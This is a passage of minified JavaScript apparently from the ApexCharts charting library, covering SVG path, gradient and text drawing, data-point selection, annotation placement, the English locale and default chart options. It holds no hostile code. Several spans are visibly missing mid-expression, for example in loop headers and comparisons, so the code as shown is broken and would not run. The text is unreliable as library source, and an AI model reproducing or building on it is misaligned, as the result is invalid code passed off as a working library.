a,n=e.j,i=e.realIndex,t=e.pathFrom,o=e.pathTo,s=e.stroke,l=e.strokeWidth,u=e.strokeLinecap,c=e.fill,d=e.animationDelay,h=e.initialSpeed,p=e.dataChangeSpeed,m=e.className,f=e.shouldClipToGrid,v=void 0===f||f,g=e.bindEventsOnPaths,b=void 0===g||g,k=e.drawShadow,S=void 0===k||k,A=this.w,w=new x(this.ctx),M=new y(this.ctx),j=this.w.config.chart.animations.enabled,C=j&&this.w.config.chart.animations.dynamicAnimation.enabled,P=!!(j&&!A.globals.resized||C&&A.globals.dataChanged&&A.globals.shouldAnimate);P?a=t:(a=o,A.globals.animationEnded=!0);var B,T=A.config.stroke.dashArray;B=Array.isArray(T)?T[i]:A.config.stroke.dashArray;var L=this.drawPath({d:a,stroke:s,strokeWidth:l,fill:c,fillOpacity:1,classes:m,strokeLinecap:u,strokeDashArray:B});if(L.attr("index",i),v&&L.attr({"clip-path":"url(#gridRectMask".concat(A.globals.cuid,")")}),"none"!==A.config.states.normal.filter.type)w.getDefaultFilter(L,i);else if(A.config.chart.dropShadow.enabled&&S&&(!A.config.chart.dropShadow.enabledOnSeries||A.config.chart.dropShadow.enabledOnSeries&&-1!==A.config.chart.dropShadow.enabledOnSeries.indexOf(i))){var z=A.config.chart.dropShadow;w.dropShadow(L,z,i)}b&&(L.node.addEventListener("mouseenter",this.pathMouseEnter.bind(this,L)),L.node.addEventListener("mouseleave",this.pathMouseLeave.bind(this,L)),L.node.addEventListener("mousedown",this.pathMouseDown.bind(this,L))),L.attr({pathTo:o,pathFrom:t});var N={el:L,j:n,realIndex:i,pathFrom:t,pathTo:o,fill:c,strokeWidth:l,delay:d};return!j||A.globals.resized||A.globals.dataChanged?!A.globals.resized&&A.globals.dataChanged||M.showDelayedElements():M.animatePathsGradually(r(r({},N),{},{speed:h})),A.globals.dataChanged&&C&&P&&M.animatePathsGradually(r(r({},N),{},{speed:p})),L}},{key:"drawPattern",value:function(e,a,n){var i=arguments.length>3&&void 0!==arguments[3]?arguments[3]:"#a8a8a8",t=arguments.length>4&&void 0!==arguments[4]?arguments[4]:0,r=this.w,o=r.globals.dom.Paper.pattern(a,n,(function(r){"horizontalLines"===e?r.line(0,0,n,0).stroke({color:i,width:t+1}):"verticalLines"===e?r.line(0,0,0,a).stroke({color:i,width:t+1}):"slantedLines"===e?r.line(0,0,a,n).stroke({color:i,width:t}):"squares"===e?r.rect(a,n).fill("none").stroke({color:i,width:t}):"circles"===e&&r.circle(a).fill("none").stroke({color:i,width:t})}));return o}},{key:"drawGradient",value:function(e,a,n,i,t){var r,o=arguments.length>5&&void 0!==arguments[5]?arguments[5]:null,s=arguments.length>6&&void 0!==arguments[6]?arguments[6]:null,l=arguments.length>7&&void 0!==arguments[7]?arguments[7]:null,u=arguments.length>8&&void 0!==arguments[8]?arguments[8]:0,c=this.w;a.length<9&&0===a.indexOf("#")&&(a=k.hexToRgba(a,i)),n.length<9&&0===n.indexOf("#")&&(n=k.hexToRgba(n,t));var d=0,h=1,p=1,m=null;null!==s&&(d=void 0!==s[0]?s[0]/100:0,h=void 0!==s[1]?s[1]/100:1,p=void 0!==s[2]?s[2]/100:1,m=void 0!==s[3]?s[3]/100:null);var f=!("donut"!==c.config.chart.type&&"pie"!==c.config.chart.type&&"polarArea"!==c.config.chart.type&&"bubble"!==c.config.chart.type);if(r=null===l||0===l.length?c.globals.dom.Paper.gradient(f?"radial":"linear",(function(e){e.at(d,a,i),e.at(h,n,t),e.at(p,n,t),null!==m&&e.at(m,a,i)})):c.globals.dom.Paper.gradient(f?"radial":"linear",(function(e){(Array.isArray(l[u])?l[u]:l).forEach((function(a){e.at(a.offset/100,a.color,a.opacity)}))})),f){var v=c.globals.gridWidth/2,g=c.globals.gridHeight/2;"bubble"!==c.config.chart.type?r.attr({gradientUnits:"userSpaceOnUse",cx:v,cy:g,r:o}):r.attr({cx:.5,cy:.5,r:.8,fx:.2,fy:.2})}else"vertical"===e?r.from(0,0).to(0,1):"diagonal"===e?r.from(0,0).to(1,1):"horizontal"===e?r.from(0,1).to(1,1):"diagonal2"===e&&r.from(1,0).to(0,1);return r}},{key:"drawText",value:function(e){var a,n=e.x,i=e.y,t=e.text,r=e.textAnchor,o=e.fontSize,s=e.fontFamily,l=e.fontWeight,u=e.foreColor,c=e.opacity,d=e.cssClass,h=void 0===d?"":d,p=e.isPlainText,m=void 0===p||p,f=this.w;return void 0===t&&(t=""),r||(r="start"),u&&u.length||(u=f.config.chart.foreColor),s=s||f.config.chart.fontFamily,l=l||"regular",(a=Array.isArray(t)?f.globals.dom.Paper.text((function(e){for(var a=0;a-1){var s=n.globals.selectedDataPoints[t].indexOf(r);n.globals.selectedDataPoints[t].splice(s,1)}}else{if(!n.config.states.active.allowMultipleDataPointsSelection&&n.globals.selectedDataPoints.length>0){n.globals.selectedDataPoints=[];var l=n.globals.dom.Paper.select(".apexcharts-series path").members,u=n.globals.dom.Paper.select(".apexcharts-series circle, .apexcharts-series rect").members,c=function(e){Array.prototype.forEach.call(e,(function(e){e.node.setAttribute("selected","false"),i.getDefaultFilter(e,t)}))};c(l),c(u)}e.node.setAttribute("selected","true"),o="true",void 0===n.globals.selectedDataPoints[t]&&(n.globals.selectedDataPoints[t]=[]),n.globals.selectedDataPoints[t].push(r)}if("true"===o){var d=n.config.states.active.filter;"none"!==d&&i.applyFilter(e,t,d.type,d.value)}else"none"!==n.config.states.active.filter.type&&i.getDefaultFilter(e,t);"function"==typeof n.config.chart.events.dataPointSelection&&n.config.chart.events.dataPointSelection(a,this.ctx,{selectedDataPoints:n.globals.selectedDataPoints,seriesIndex:t,dataPointIndex:r,w:n}),a&&this.ctx.events.fireEvent("dataPointSelection",[a,this.ctx,{selectedDataPoints:n.globals.selectedDataPoints,seriesIndex:t,dataPointIndex:r,w:n}])}},{key:"rotateAroundCenter",value:function(e){var a={};return e&&"function"==typeof e.getBBox&&(a=e.getBBox()),{x:a.x+a.width/2,y:a.y+a.height/2}}},{key:"getTextRects",value:function(e,a,n,i){var t=!(arguments.length>4&&void 0!==arguments[4])||arguments[4],r=this.w,o=this.drawText({x:-200,y:-200,text:e,textAnchor:"start",fontSize:a,fontFamily:n,foreColor:"#fff",opacity:0});i&&o.attr("transform",i),r.globals.dom.Paper.add(o);var s=o.bbox();return t||(s=o.node.getBoundingClientRect()),o.remove(),{width:s.width,height:s.height}}},{key:"placeTextWithEllipsis",value:function(e,a,n){if("function"==typeof e.getComputedTextLength&&(e.textContent=a,a.length>0&&e.getComputedTextLength()>=n/1.1)){for(var i=a.length-3;i>0;i-=3)if(e.getSubStringLength(0,i)<=n/1.1)return void(e.textContent=a.substring(0,i)+"...");e.textContent="."}}}],[{key:"setAttrs",value:function(e,a){for(var n in a)a.hasOwnProperty(n)&&e.setAttribute(n,a[n])}}]),e}(),A=function(){function e(a){s(this,e),this.ctx=a,this.w=a.w}return u(e,[{key:"getStackedSeriesTotals",value:function(){var e=this.w,a=[];if(0===e.globals.series.length)return a;for(var n=0;n0&&void 0!==arguments[0]?arguments[0]:null;return null===e?this.w.config.series.reduce((function(e,a){return e+a}),0):this.w.globals.series[e].reduce((function(e,a){return e+a}),0)}},{key:"isSeriesNull",value:function(){var e=arguments.length>0&&void 0!==arguments[0]?arguments[0]:null;return 0===(null===e?this.w.config.series.filter((function(e){return null!==e})):this.w.config.series[e].data.filter((function(e){return null!==e}))).length}},{key:"seriesHaveSameValues",value:function(e){return this.w.globals.series[e].every((function(e,a,n){return e===n[0]}))}},{key:"getCategoryLabels",value:function(e){var a=this.w,n=e.slice();return a.config.xaxis.convertedCatToNumeric&&(n=e.map((function(e,n){return a.config.xaxis.labels.formatter(e-a.globals.minX+1)}))),n}},{key:"getLargestSeries",value:function(){var e=this.w;e.globals.maxValsInArrayIndex=e.globals.series.map((function(e){return e.length})).indexOf(Math.max.apply(Math,e.globals.series.map((function(e){return e.length}))))}},{key:"getLargestMarkerSize",value:function(){var e=this.w,a=0;return e.globals.markers.size.forEach((function(e){a=Math.max(a,e)})),e.config.markers.discrete&&e.config.markers.discrete.length&&e.config.markers.discrete.forEach((function(e){a=Math.max(a,e.size)})),a>0&&(a+=e.config.markers.hover.sizeOffset+1),e.globals.markers.largestSize=a,a}},{key:"getSeriesTotals",value:function(){var e=this.w;e.globals.seriesTotals=e.globals.series.map((function(e,a){var n=0;if(Array.isArray(e))for(var i=0;ie&&n.globals.seriesX[t][o]0&&(a=!0),{comboBarCount:n,comboCharts:a}}},{key:"extendArrayProps",value:function(e,a,n){return a.yaxis&&(a=e.extendYAxis(a,n)),a.annotations&&(a.annotations.yaxis&&(a=e.extendYAxisAnnotations(a)),a.annotations.xaxis&&(a=e.extendXAxisAnnotations(a)),a.annotations.points&&(a=e.extendPointAnnotations(a))),a}}]),e}(),w=function(){function e(a){s(this,e),this.w=a.w,this.annoCtx=a}return u(e,[{key:"setOrientations",value:function(e){var a=arguments.length>1&&void 0!==arguments[1]?arguments[1]:null,n=this.w;if("vertical"===e.label.orientation){var i=null!==a?a:0,t=n.globals.dom.baseEl.querySelector(".apexcharts-xaxis-annotations .apexcharts-xaxis-annotation-label[rel='".concat(i,"']"));if(null!==t){var r=t.getBoundingClientRect();t.setAttribute("x",parseFloat(t.getAttribute("x"))-r.height+4),"top"===e.label.position?t.setAttribute("y",parseFloat(t.getAttribute("y"))+r.width):t.setAttribute("y",parseFloat(t.getAttribute("y"))-r.width);var o=this.annoCtx.graphics.rotateAroundCenter(t),s=o.x,l=o.y;t.setAttribute("transform","rotate(-90 ".concat(s," ").concat(l,")"))}}}},{key:"addBackgroundToAnno",value:function(e,a){var n=this.w;if(!e||void 0===a.label.text||void 0!==a.label.text&&!String(a.label.text).trim())return null;var i=n.globals.dom.baseEl.querySelector(".apexcharts-grid").getBoundingClientRect(),t=e.getBoundingClientRect(),r=a.label.style.padding.left,o=a.label.style.padding.right,s=a.label.style.padding.top,l=a.label.style.padding.bottom;"vertical"===a.label.orientation&&(s=a.label.style.padding.left,l=a.label.style.padding.right,r=a.label.style.padding.top,o=a.label.style.padding.bottom);var u=t.left-i.left-r,c=t.top-i.top-s,d=this.annoCtx.graphics.drawRect(u-n.globals.barPadForNumericAxis,c,t.width+r+o,t.height+s+l,a.label.borderRadius,a.label.style.background,1,a.label.borderWidth,a.label.borderColor,0);return a.id&&d.node.classList.add(a.id),d}},{key:"annotationsBackground",value:function(){var e=this,a=this.w,n=function(n,i,t){var r=a.globals.dom.baseEl.querySelector(".apexcharts-".concat(t,"-annotations .apexcharts-").concat(t,"-annotation-label[rel='").concat(i,"']"));if(r){var o=r.parentNode,s=e.addBackgroundToAnno(r,n);s&&(o.insertBefore(s.node,r),n.label.mouseEnter&&s.node.addEventListener("mouseenter",n.label.mouseEnter.bind(e,n)),n.label.mouseLeave&&s.node.addEventListener("mouseleave",n.label.mouseLeave.bind(e,n)))}};a.config.annotations.xaxis.map((function(e,a){n(e,a,"xaxis")})),a.config.annotations.yaxis.map((function(e,a){n(e,a,"yaxis")})),a.config.annotations.points.map((function(e,a){n(e,a,"point")}))}},{key:"getY1Y2",value:function(e,a){var n,i="y1"===e?a.y:a.y2,t=this.w;if(this.annoCtx.invertAxis){var r=t.globals.labels.indexOf(i);t.config.xaxis.convertedCatToNumeric&&(r=t.globals.categoryLabels.indexOf(i));var o=t.globals.dom.baseEl.querySelector(".apexcharts-yaxis-texts-g text:nth-child("+(r+1)+")");o&&(n=parseFloat(o.getAttribute("y")))}else{var s;s=t.config.yaxis[a.yAxisIndex].logarithmic?(i=new A(this.annoCtx.ctx).getLogVal(i,a.yAxisIndex))/t.globals.yLogRatio[a.yAxisIndex]:(i-t.globals.minYArr[a.yAxisIndex])/(t.globals.yRange[a.yAxisIndex]/t.globals.gridHeight),n=t.globals.gridHeight-s,t.config.yaxis[a.yAxisIndex]&&t.config.yaxis[a.yAxisIndex].reversed&&(n=s)}return n}},{key:"getX1X2",value:function(e,a){var n=this.w,i=this.annoCtx.invertAxis?n.globals.minY:n.globals.minX,t=this.annoCtx.invertAxis?n.globals.maxY:n.globals.maxX,r=this.annoCtx.invertAxis?n.globals.yRange[0]:n.globals.xRange,o=(a.x-i)/(r/n.globals.gridWidth);this.annoCtx.inversedReversedAxis&&(o=(t-a.x)/(r/n.globals.gridWidth)),"category"!==n.config.xaxis.type&&!n.config.xaxis.convertedCatToNumeric||this.annoCtx.invertAxis||n.globals.dataFormatXNumeric||(o=this.getStringX(a.x));var s=(a.x2-i)/(r/n.globals.gridWidth);return this.annoCtx.inversedReversedAxis&&(s=(t-a.x2)/(r/n.globals.gridWidth)),"category"!==n.config.xaxis.type&&!n.config.xaxis.convertedCatToNumeric||this.annoCtx.invertAxis||n.globals.dataFormatXNumeric||(s=this.getStringX(a.x2)),"x1"===e?o:s}},{key:"getStringX",value:function(e){var a=this.w,n=e;a.config.xaxis.convertedCatToNumeric&&a.globals.categoryLabels.length&&(e=a.globals.categoryLabels.indexOf(e)+1);var i=a.globals.labels.indexOf(e),t=a.globals.dom.baseEl.querySelector(".apexcharts-xaxis-texts-g text:nth-child("+(i+1)+")");return t&&(n=parseFloat(t.getAttribute("x"))),n}}]),e}(),M=function(){function e(a){s(this,e),this.w=a.w,this.annoCtx=a,this.invertAxis=this.annoCtx.invertAxis,this.helpers=new w(this.annoCtx)}return u(e,[{key:"addXaxisAnnotation",value:function(e,a,n){var i,t=this.w,r=this.helpers.getX1X2("x1",e),o=e.label.text,s=e.strokeDashArray;if(k.isNumber(r)){if(null===e.x2||void 0===e.x2){var l=this.annoCtx.graphics.drawLine(r+e.offsetX,0+e.offsetY,r+e.offsetX,t.globals.gridHeight+e.offsetY,e.borderColor,s,e.borderWidth);a.appendChild(l.node),e.id&&l.node.classList.add(e.id)}else{if((i=this.helpers.getX1X2("x2",e))o){var u=o;o=i,i=u}var c=this.annoCtx.graphics.drawRect(0+e.offsetX,i+e.offsetY,this._getYAxisAnnotationWidth(e),o-i,0,e.fillColor,e.opacity,1,e.borderColor,r);c.node.classList.add("apexcharts-annotation-rect"),c.attr("clip-path","url(#gridRectMask".concat(t.globals.cuid,")")),a.appendChild(c.node),e.id&&c.node.classList.add(e.id)}var d="right"===e.label.position?t.globals.gridWidth:0,h=this.annoCtx.graphics.drawText({x:d+e.label.offsetX,y:(null!=i?i:o)+e.label.offsetY-3,text:s,textAnchor:e.label.textAnchor,fontSize:e.label.style.fontSize,fontFamily:e.label.style.fontFamily,fontWeight:e.label.style.fontWeight,foreColor:e.label.style.color,cssClass:"apexcharts-yaxis-annotation-label ".concat(e.label.style.cssClass," ").concat(e.id?e.id:"")});h.attr({rel:n}),a.appendChild(h.node)}},{key:"_getYAxisAnnotationWidth",value:function(e){var a=this.w;return a.globals.gridWidth,(e.width.indexOf("%")>-1?a.globals.gridWidth*parseInt(e.width,10)/100:parseInt(e.width,10))+e.offsetX}},{key:"drawYAxisAnnotations",value:function(){var e=this,a=this.w,n=this.annoCtx.graphics.group({class:"apexcharts-yaxis-annotations"});return a.config.annotations.yaxis.map((function(a,i){e.addYaxisAnnotation(a,n.node,i)})),n}}]),e}(),C=function(){function e(a){s(this,e),this.w=a.w,this.annoCtx=a,this.helpers=new w(this.annoCtx)}return u(e,[{key:"addPointAnnotation",value:function(e,a,n){this.w;var i=this.helpers.getX1X2("x1",e),t=this.helpers.getY1Y2("y1",e);if(k.isNumber(i)){var r={pSize:e.marker.size,pointStrokeWidth:e.marker.strokeWidth,pointFillColor:e.marker.fillColor,pointStrokeColor:e.marker.strokeColor,shape:e.marker.shape,pRadius:e.marker.radius,class:"apexcharts-point-annotation-marker ".concat(e.marker.cssClass," ").concat(e.id?e.id:"")},o=this.annoCtx.graphics.drawMarker(i+e.marker.offsetX,t+e.marker.offsetY,r);a.appendChild(o.node);var s=e.label.text?e.label.text:"",l=this.annoCtx.graphics.drawText({x:i+e.label.offsetX,y:t+e.label.offsetY-e.marker.size-parseFloat(e.label.style.fontSize)/1.6,text:s,textAnchor:e.label.textAnchor,fontSize:e.label.style.fontSize,fontFamily:e.label.style.fontFamily,fontWeight:e.label.style.fontWeight,foreColor:e.label.style.color,cssClass:"apexcharts-point-annotation-label ".concat(e.label.style.cssClass," ").concat(e.id?e.id:"")});if(l.attr({rel:n}),a.appendChild(l.node),e.customSVG.SVG){var u=this.annoCtx.graphics.group({class:"apexcharts-point-annotations-custom-svg "+e.customSVG.cssClass});u.attr({transform:"translate(".concat(i+e.customSVG.offsetX,", ").concat(t+e.customSVG.offsetY,")")}),u.node.innerHTML=e.customSVG.SVG,a.appendChild(u.node)}if(e.image.path){var c=e.image.width?e.image.width:20,d=e.image.height?e.image.height:20;o=this.annoCtx.addImage({x:i+e.image.offsetX-c/2,y:t+e.image.offsetY-d/2,width:c,height:d,path:e.image.path,appendTo:".apexcharts-point-annotations"})}e.mouseEnter&&o.node.addEventListener("mouseenter",e.mouseEnter.bind(this,e)),e.mouseLeave&&o.node.addEventListener("mouseleave",e.mouseLeave.bind(this,e))}}},{key:"drawPointAnnotations",value:function(){var e=this,a=this.w,n=this.annoCtx.graphics.group({class:"apexcharts-point-annotations"});return a.config.annotations.points.map((function(a,i){e.addPointAnnotation(a,n.node,i)})),n}}]),e}(),P={name:"en",options:{months:["January","February","March","April","May","June","July","August","September","October","November","December"],shortMonths:["Jan","Feb","Mar","Apr","May","Jun","Jul","Aug","Sep","Oct","Nov","Dec"],days:["Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday"],shortDays:["Sun","Mon","Tue","Wed","Thu","Fri","Sat"],toolbar:{exportToSVG:"Download SVG",exportToPNG:"Download PNG",exportToCSV:"Download CSV",menu:"Menu",selection:"Selection",selectionZoom:"Selection Zoom",zoomIn:"Zoom In",zoomOut:"Zoom Out",pan:"Panning",reset:"Reset Zoom"}}},B=function(){function e(){s(this,e),this.yAxis={show:!0,showAlways:!1,showForNullSeries:!0,seriesName:void 0,opposite:!1,reversed:!1,logarithmic:!1,logBase:10,tickAmount:void 0,forceNiceScale:!1,max:void 0,min:void 0,floating:!1,decimalsInFloat:void 0,labels:{show:!0,minWidth:0,maxWidth:160,offsetX:0,offsetY:0,align:void 0,rotate:0,padding:20,style:{colors:[],fontSize:"11px",fontWeight:400,fontFamily:void 0,cssClass:""},formatter:void 0},axisBorder:{show:!1,color:"#e0e0e0",width:1,offsetX:0,offsetY:0},axisTicks:{show:!1,color:"#e0e0e0",width:6,offsetX:0,offsetY:0},title:{text:void 0,rotate:-90,offsetY:0,offsetX:0,style:{color:void 0,fontSize:"11px",fontWeight:900,fontFamily:void 0,cssClass:""}},tooltip:{enabled:!1,offsetX:0},crosshairs:{show:!0,position:"front",stroke:{color:"#b6b6b6",width:1,dashArray:0}}},this.pointAnnotation={id:void 0,x:0,y:null,yAxisIndex:0,seriesIndex:0,mouseEnter:void 0,mouseLeave:void 0,marker:{size:4,fillColor:"#fff",strokeWidth:2,strokeColor:"#333",shape:"circle",offsetX:0,offsetY:0,radius:2,cssClass:""},label:{borderColor:"#c2c2c2",borderWidth:1,borderRadius:2,text:void 0,textAnchor:"middle",offsetX:0,offsetY:0,mouseEnter:void 0,mouseLeave:void 0,style:{background:"#fff",color:void 0,fontSize:"11px",fontFamily:void 0,fontWeight:400,cssClass:"",padding:{left:5,right:5,top:2,bottom:2}}},customSVG:{SVG:void 0,cssClass:void 0,offsetX:0,offsetY:0},image:{path:void 0,width:20,height:20,offsetX:0,offsetY:0}},this.yAxisAnnotation={id:void 0,y:0,y2:null,strokeDashArray:1,fillColor:"#c2c2c2",borderColor:"#c2c2c2",borderWidth:1,opacity:.3,offsetX:0,offsetY:0,width:"100%",yAxisIndex:0,label:{borderColor:"#c2c2c2",borderWidth:1,borderRadius:2,text:void 0,textAnchor:"end",position:"right",offsetX:0,offsetY:-3,mouseEnter:void 0,mouseLeave:void 0,style:{background:"#fff",color:void 0,fontSize:"11px",fontFamily:void 0,fontWeight:400,cssClass:"",padding:{left:5,right:5,top:2,bottom:2}}}},this.xAxisAnnotation={id:void 0,x:0,x2:null,strokeDashArray:1,fillColor:"#c2c2c2",borderColor:"#c2c2c2",borderWidth:1,opacity:.3,offsetX:0,offsetY:0,label:{borderColor:"#c2c2c2",borderWidth:1,borderRadius:2,text:void 0,textAnchor:"middle",orientation:"vertical",position:"top",offsetX:0,offsetY:0,mouseEnter:void 0,mouseLeave:void 0,style:{background:"#fff",color:void 0,fontSize:"11px",fontFamily:void 0,fontWeight:400,cssClass:"",padding:{left:5,right:5,top:2,bottom:2}}}},this.text={x:0,y:0,text:"",textAnchor:"start",foreColor:void 0,fontSize:"13px",fontFamily:void 0,fontWeight:400,appendTo:".apexcharts-annotations",backgroundColor:"transparent",borderColor:"#c2c2c2",borderRadius:0,borderWidth:0,paddingLeft:4,paddingRight:4,paddingTop:2,paddingBottom:2}}return u(e,[{key:"init",value:function(){return{annotations:{position:"front",yaxis:[this.yAxisAnnotation],xaxis:[this.xAxisAnnotation],points:[this.pointAnnotation],texts:[],images:[],shapes:[]},chart:{animations:{enabled:!0,easing:"easeinout",speed:800,animateGradually:{delay:150,enabled:!0},dynamicAnimation:{enabled:!0,speed:350}},background:"transparent",locales:[P],defaultLocale:"en",dropShadow:{enabled:!1,enabledOnSeries:void 0,top:2,left:2,blur:4,color:"#000",opacity:.35},events:{animationEnd:void 0,beforeMount:void 0,mounted:void 0,updated:void 0,click:void 0,mouseMove:void 0,mouseLeave:void 0,legendClick:void 0,markerClick:void 0,selection:void 0,dataPointSelection:void 0,dataPointMouseEnter:void 0,dataPointMouseLeave:void 0,beforeZoom:void 0,beforeResetZoom:void 0,zoomed:void 0,scrolled:void 0,brushScrolled:void 0},foreColor:"#373d3f",fontFamily:"Helvetica, Arial, sans-serif",height:"auto",parentHeightOffset:15,redrawOnParentResize:!0,redrawOnWindowResize:!0,id:void 0,group:void 0,offsetX:0,offsetY:0,selection:{enabled:!1,type:"x",fill:{color:"#24292e",opacity:.1},stroke:{width:1,color:"#24292e",opacity:.4,dashArray:3},xaxis:{min:void 0,max:void 0},yaxis:{min:void 0,max:void 0}},sparkline:{enabled:!1},brush:{enabled:!1,autoScaleYaxis:!0,target:void 0},stacked:!1,stackType:"normal",toolbar:{show:!0,offsetX:0,offsetY:0,tools:{download:!0,selection:!0,zoom:!0,zoomin:!0,zoomout:!0,pan:!0,reset:!0,customIcons:[]},export:{csv:{filename:void 0,columnDelimiter:",",headerCategory:"category",headerValue:"value",dateFormatter:function(e){return new Date(e).toDateString()}},png:{filename:void 0},svg:{filename:void 0}},autoSelected:"zoom"},type:"line",width:"100%",zoom:{enabled:!0,type:"x",autoScaleYaxis:!1,zoomedArea:{fill:{color:"#90CAF9",opacity:.4},stroke:{color:"#0D47A1",opacity:.4,width:1}}}},plotOptions:{area:{fillTo:"origin"},bar:{horizontal:!1,columnWidth:"70%",barHeight:"70%",distributed:!1,borderRadius:0,rangeBarOverlap:!0,rangeBarGroupRows:!1,colors:{ranges:[],backgroundBarColors:[],backgroundBarOpacity:1,backgroundBarRadius:0},dataLabels:{position:"top",maxItems:100,hideOverflowingLabels:!0,orientation:"horizontal"}},bubble:{minBubbleRadius:void 0,maxBubbleRadius:void 0},candlestick:{colors:{upward:"#00B746",downward:"#EF403C"},wick:{useFillColor:!0}},boxPlot:{colors:{upper:"#00E396",lower:"#008FFB"}},heatmap:{radius:2,enableShades:!0,shadeIntensity:.5,reverseNegativeShade:!1,distributed:!1,useFillColorAsStroke:!1,colorScale:{inverse:!1,ranges:[],min:void 0,max:void 0}},treemap:{enableShades:!0,shadeIntensity:.5,distributed:!1,reverseNegativeShade:!1,useFillColorAsStroke:!1,colorScale:{inverse:!1,ranges:[],min:void 0,max:void 0}},radialBar:{inverseOrder:!1,startAngle:0,endAngle:360,offsetX:0,offsetY:0,hollow:{margin:5,size:"50%",background:"transparent",image:void 0,imageWidth:150,imageHeight:150,imageOffsetX:0,imageOffsetY:0,imageClipped:!0,position:"front",dropShadow:{enabled:!1,top:0,left:0,blur:3,color:"#000",opacity:.5}},track:{show:!0,startAngle:void 0,endAngle:void 0,background:"#f2f2f2",strokeWidth:"97%",opacity:1,margin:5,dropShadow:{enabled:!1,top:0,left:0,blur:3,color:"#000",opacity:.5}},dataLabels:{show:!0,name:{show:!0,fontSize:"16px",fontFamily:void 0,fontWeight:600,color:void 0,offsetY:0,formatter:function(e){return e}},value:{show:!0,fontSize:"14px",fontFamily:void 0,fontWeight:400,color:void 0,offsetY:16,formatter:function(e){return e+"%"}},total:{show:!1,label:"Total",fontSize:"16px",fontWeight:600,fontFamily:void 0,color:void 0,formatter:function(e){return e.globals.seriesTotals.reduce((function(e,a){return e+a}),0)/e.globals.series.length+"%"}}}},pie:{customScale:1,offsetX:0,offsetY:0,startAngle:0,endAngle:360,expandOnClick:!0,dataLabels:{offset:0,minAngleToShowLabel:10},donut:{size:"65%",background:"transparent",labels:{show:!1,name:{show:!0,fontSize:"16px",fontFamily:void 0,fontWeight:600,color:void 0,offsetY:-10,formatter:function(e){return e}},value:{show:!0,fontSize:"20px",fontFamily:void 0,fontWeight:400,color:void 0,offsetY:10,formatter:function(e){return e}},total:{show:!1,showAlways:!1,label:"Total",fontSize:"16px",fontWeight:400,fontFamily:void 0,color:void 0,formatter:function(e){return e.globals.seriesTotals.reduce((function(e,a){return e+a}),0)}}}}},polarArea:{rings:{strokeWidth:1,strokeColor:"#e8e8e8"},spokes:{strokeWidth:1,connectorColors:"#e8e8e8"}},radar:{size:void 0,offsetX:0,offsetY:0,polygons:{strokeWidth:1,strokeColors:"#e8e8e8",connectorColors:"#e8e8e8",fill:{colors:void 0}}}},colors:void 0,dataLabels:{enabled:!0,enabledOnSeries:void 0,formatter:function(e){return null!==e?e:""},textAnchor:"middle",distributed:!1,offsetX:0,offsetY:0,style:{fontSize:"12px",fontFamily:void 0,fontWeight:600,colors:void 0},background:{enabled:!0,foreColor:"#fff",borderRadius:2,padding:4,opacity:.9,borderWidth:1,borderColor:"#fff",dropShadow:{enabled:!1,top:1,left:1,blur:1,color:"#000",opacity:.45}},dropShadow:{enabled:!1,top:1,left:1,blur:1,color:"#000",opacity:.45}},fill:{type:"solid",colors:void 0,opacity:.85,gradient:{shade:"dark",type:"horizontal",shadeIntensity:.5,gradientToColors:void 0,inverseColors:!0,opacityFrom:1,opacityTo:1,stops:[0,50,100],colorStops:[]},image:{src:[],width:void 0,height:void 0},pattern:{style:"squares",width:6,height:6,strokeWidth:2}},forecastDataPoints:{count:0,fillOpacity:.5,strokeWidth:void 0,dashArray:4},grid:{show:!0,borderColor:"#e0e0e0",strokeDashArray:0,position:"back",xaxis:{lines:{show:!1}},yaxis:{lines:{show:!0}},row:{colors:void 0,opacity:.5},column:{colors:void 0,opacity:.5},padding:{top:0,right:10,bottom:0,left:12}},labels:[],legend:{show:!0,showForSingleSeries:!1,showForNullSeries:!0,showForZeroSeries:!0,floating:!1,position:"bottom",horizontalAlign:"center",inverseOrder:!1,fontSize:"12px",fontFamily:void 0,fontWeight:400,width:void 0,height:void 0,formatter:void 0,tooltipHoverFormatter:void 0,offsetX:-20,offsetY:4,customLegendItems:[],labels:{colors:void 0,useSeriesColors:!1},markers:{width:12,height:12,strokeWidth:0,fillColors:void 0,strokeColor:"#fff",radius:12,customHTML:void 0,offsetX:0,offsetY:0,onClick:void 0},itemMargin:{horizontal:5,vertical:2},onItemClick:{toggleDataSeries:!0},onItemHover:{highlightDataSeries:!0}},markers:{discrete:[],size:0,colors:void 0,strokeColors:"#fff",strokeWidth:2,strokeOpacity:.9,strokeDashArray:0,fillOpacity:1,shape:"circle",width:8,height:8,radius:2,offsetX:0,offsetY:0,onClick:void 0,onDblClick:void 0,showNullDataPoints:!0,hover:{size:void 0,sizeOffset:3}},noData:{text:void 0,align:"center",verticalAlign:"middle",offsetX:0,offsetY:0,style:{color:void 0,fontSize:"14px",fontFamily:void 0}},responsive:[],series:void 0,states:{normal:{filter:{type:"none",value:0}},hover:{filter:{type:"lighten",value:.1}},active:{allowMultipleDataPointsSelection:!1,filter:{type:"darken",value:.5}}},title:{text:void 0,align:"left",margin:5,offsetX:0,offsetY:0,floating:!1,style:{fontSize:"14px",fontWeight:900,fontFamily:void 0,color:void 0}},subtitle:{text:void 0,align:"left",margin:5,offsetX:0,offsetY:30,floating:!1,style:{fontSize:"12px",fontWeight:400,fontFamily:void 0,color:void 0}},stroke:{show:!0,curve:"smooth",lineCap:"butt",width:2,colors:void 0,dashArray:0},tooltip:{enabled:!0,enabledOnSeries:void 0,shared:!0,followCursor:!1,intersect:!1,inverseOrder:!1,custom:void 0,fillSeriesColor:!1,theme:"light",cssClass:"",style:{fontSize:"12px",fontFamily:void 0},onDatasetHover:{highlightDataSeries:!1},x:{show:!0,format:"dd MMM",formatter:void 0},y:{formatter:void 0,title:{formatter:function(e){return e?e+": ":""}}},z:{formatter:void 0,title:"Size: "},marker:{show:!0,fillColors:void 0},items:{display:"flex"},fixed:{enabled:!1,position:"topRight",offsetX:0,offsetY:0}},xaxis:{type:"category",categories:[],convertedCatToNumeric:!1,offsetX:0,offsetY:0,overwriteCategories:void 0,labels:{show:!0,rotate:-45,rotateAlways:!1,hideOverlappingLabels:!0,trim:!1,minHeight:void 0,maxHeight:120,showDuplicates:!0,style:{colors:[],fontSize:"12px",fontWeight:400,fontFamily:void 0,cssClass:""},offsetX:0,offsetY:0,format:void 0,formatter:void 0,datetimeUTC:!0,datetimeFormatter:{year:"yyyy",month:"MMM 'yy",day:"dd MMM",hour:"HH:mm",minute:"HH:mm:ss",second:"HH:mm:ss"},group:{groups:[],style:{colors:[],fontSize:"12px",fontWeight:400,fontFamily:void 